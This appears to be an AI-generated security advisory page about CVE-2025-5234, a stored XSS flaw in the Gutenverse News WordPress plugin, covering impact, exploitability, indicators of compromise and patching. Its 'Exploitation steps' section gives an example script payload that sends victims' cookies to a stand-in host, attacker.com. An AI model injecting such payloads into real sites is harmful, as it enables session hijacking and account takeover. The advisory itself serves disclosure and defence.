CVE-2025-5234
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-5234 is a Stored Cross-Site Scripting (XSS) vulnerability in the Gutenverse News plugin for WordPress, affecting all versions up to and including 1.0.4. The flaw resides in the elementId parameter, which lacks sufficient input sanitization and output escaping, enabling authenticated attackers with Contributor-level access or higher to inject persistent malicious scripts. It was published on June 19, 2025, with a patch released in version 2.0.0. The vulnerability carries a CVSS v3.1 base score of 5.4 (Medium) (Feedly, Wordfence).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), stemming from the plugin's failure to sanitize user-supplied input in the elementId parameter and to properly escape output when rendering page content. An authenticated attacker with at least Contributor-level WordPress privileges can craft a malicious block or page element containing injected JavaScript, which is then stored in the database and executed in the browser of any user who subsequently visits the affected page. The patch, available in the WordPress plugin repository changeset 3313123, modifies class-grab.php to address the sanitization gap (Feedly, WordPress Trac).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browser sessions, including administrators. This can result in session cookie theft, credential hijacking, unauthorized redirection to malicious sites, manipulation of page content, and potential data exfiltration. While availability is not directly impacted, the confidentiality and integrity of affected WordPress sites and their users are at risk (Feedly).

Exploitability

As of the time of reporting, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation. The vulnerability requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated flaws. The EPSS score is approximately 0.032% (0.000320), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Feedly, Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Gutenverse News plugin version 1.0.4 or earlier, using tools like WPScan or by inspecting plugin metadata in page source.
  2. Obtain Contributor access: Register or compromise an account with at least Contributor-level privileges on the target WordPress site.
  3. Craft malicious content: Create or edit a post/page using the Gutenverse News block, injecting a malicious JavaScript payload into the elementId parameter (e.g., "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  4. Publish the page: Submit the content so the injected script is stored in the WordPress database.
  5. Trigger execution: Wait for a higher-privileged user (e.g., administrator) to visit the compromised page, at which point the injected script executes in their browser, enabling session hijacking or further exploitation (Feedly).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to post/page editing endpoints by Contributor-level accounts containing unusual script tags or encoded JavaScript in block parameters.
  • Database: WordPress wp_posts or wp_postmeta tables containing entries with <script>, javascript:, or encoded XSS payloads within Gutenverse News block attributes, particularly in elementId fields.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages containing Gutenverse News blocks, potentially indicating cookie or credential exfiltration.
  • File System: Unexpected modifications to class-grab.php in the Gutenverse News plugin directory if an attacker has also achieved file write access (Feedly).

Mitigation and workarounds

The primary remediation is to update the Gutenverse News plugin to version 2.0.0 or later, which addresses the sanitization and escaping deficiencies in class-grab.php (WordPress Trac). As interim measures, site administrators should restrict Contributor-level user registrations, audit existing Contributor accounts for suspicious activity, and consider deploying a WordPress security plugin with XSS filtering capabilities. Regularly reviewing plugin configurations and monitoring for unexpected content changes is also recommended (Feedly).

Community reactions

Wordfence included CVE-2025-5234 in its weekly WordPress vulnerability report for the period of June 16–22, 2025, flagging it as part of routine plugin security monitoring (Wordfence). No significant independent researcher commentary or broader media coverage has been identified for this vulnerability.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NoYesAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NoYesAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NoYesAug 23, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management